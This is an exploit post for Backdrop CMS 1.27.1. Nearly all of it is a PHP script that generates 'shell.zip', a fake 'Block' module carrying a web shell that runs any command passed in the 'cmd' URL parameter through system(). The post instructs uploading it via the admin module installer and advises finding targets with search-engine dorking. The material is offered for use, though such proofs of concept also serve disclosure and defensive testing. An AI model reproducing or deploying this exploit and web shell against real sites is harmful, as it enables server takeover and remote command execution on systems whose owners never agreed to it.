=============================================================================================================================================
| # Title     : Backdrop CMS 1.27.1 PHP COde Injection Vulnerability                                                                        |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip                                                  |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: Backdrop CMS 1.27.1 - Remote Command Execution Exploit in PHP

   (Related : https://packetstorm.news/files/id/178631/ Related CVE numbers:  ) .
	
[+] save code as poc.php.

[+] Usage: php script.php [url]

[+] PayLoad :

<?php

function create_files() {
    $info_content = <<<EOL
type = module
name = Block
description = Controls the visual building blocks a page is constructed
with. Blocks are boxes of content rendered into an area, or region, of a
web page.
package = Layouts
tags[] = Blocks
tags[] = Site Architecture
version = BACKDROP_VERSION
backdrop = 1.x

configure = admin/structure/block

; Added by Backdrop CMS packaging script on 2024-03-07
project = backdrop
version = 1.27.1
timestamp = 1709862662
EOL;

    $shell_info_path = "shell/shell.info";
    if (!file_exists(dirname($shell_info_path))) {
        mkdir(dirname($shell_info_path), 0777, true); // إنشاء المجلد إذا لم يكن موجودًا
    }
    file_put_contents($shell_info_path, $info_content);

    $shell_content = <<<EOL
<html>
<body>
<form method="GET" name="<?php echo basename(\$_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset(\$_GET['cmd'])) {
    system(\$_GET['cmd']);
}
?>
</pre>
</body>
</html>
EOL;

    $shell_php_path = "shell/shell.php";
    file_put_contents($shell_php_path, $shell_content);

    return [$shell_info_path, $shell_php_path];
}

function create_zip($info_path, $php_path) {
    $zip_filename = "shell.zip";
    $zip = new ZipArchive();
    if ($zip->open($zip_filename, ZipArchive::CREATE) === TRUE) {
        $zip->addFile($info_path, 'shell/shell.info');
        $zip->addFile($php_path, 'shell/shell.php');
        $zip->close();
    }
    return $zip_filename;
}

function main($url) {
    echo "Backdrop CMS 1.27.1 - Remote Command Execution Exploit\n";
    sleep(3);

    echo "Evil module generating...\n";
    sleep(2);

    list($info_path, $php_path) = create_files();
    $zip_filename = create_zip($info_path, $php_path);

    echo "Evil module generated! $zip_filename\n";
    sleep(2);

    echo "Go to $url/admin/modules/install and upload the $zip_filename for Manual Installation.\n";
    sleep(2);

    echo "Your shell address: $url/modules/shell/shell.php\n";
}

if ($argc < 2) {
    echo "Usage: php script.php [url]\n";
} else {
    main($argv[1]);
}

?>






Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================